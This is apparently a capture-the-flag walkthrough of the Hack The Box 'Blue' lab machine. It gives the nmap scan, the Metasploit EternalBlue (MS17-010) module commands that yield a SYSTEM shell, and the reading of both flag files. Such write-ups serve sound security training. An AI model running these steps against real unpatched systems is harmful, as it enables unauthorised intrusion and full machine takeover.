Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. BLUE BOX is for beginners, one can learn quite many things from it.
We will use the following tools to pawn the box on a Kali Linux box
- NMAP
- Smbclient(Enumeration)
- msfconsole
Step 1 – Scanning the network
As an initial step, before the machine is exploited, it needs to be scanned and investigated.
This is important to determine what can be exploited afterwards. Therefore, it is always better to spend time on this phase to extract maximum information.
NMAP (Network Mapper). NMAP is a free and open source utility for network discovery and security auditing. Raw IP packets are used to determine hosts available on the network, services offered by those hosts, operating systems running, packet filters, firewalls in use, and many other characteristics.
Use the following command to get a basic idea of what we are scanning
nmap -sC -sV -A 10.10.10.40
-sV: Probe open ports to determine service/version info
-sC: Default script sets
-A: Aggressive scan. Enable OS detection, version detection, script scanning, and traceroute
10.10.10.40: IP address of the Blue box
We can see that there are following ports running:
We find that “SMB” is running, so we try to find an exploit for the system.
As we can see from the scan that this machine is vulnerable to MS17–010 which is an exploit against SMB (EternalBlue). This exploit is available on the metasploit framework.
Step 2 – The Vulnerable smb
We will search in msfconsole to check vulnerability on SMB.
I use the following command to find the exploits.
search smb
We get the following vulnerability.
exploit/windows/smb/ms17_010_eternalblue
Following command is used for the exploit
use exploit/windows/smb/ms17_010_eternalblue
This will launch the exploit. This command displays the available options.
show options
You can see that the remote host (RHOSTS) is not yet set. RHOSTS will be the victim.
Following command sets the remote host using the IP address of HTB Blue box
set RHOSTS 10.10.10.40
The exploit can be run now.
Bingo! A command shell is thus opened. Let’s see what can be found 🙂
Step 3 – Looking for the user.txt flag
Following command is used to know what my position in the machine is.
whoami
The response is: nt authority\system
Following command is used to go to the parent directory.
cd..
Let’s move to the users folder and see what can be found
cd haris
We found the user.txt file in haris folder! To read the content of the file following command is used.
type user.txt
Step 4 – Looking for the root.txt flag
Now look for flag root.txt
Get back to the Administrator directory.
cd administrator
We found the root.txt file in Desktop folder! To read the content of the file following command is used.
type root.txt
Congrats! You found both flags! Therefore, hope you found the box easy.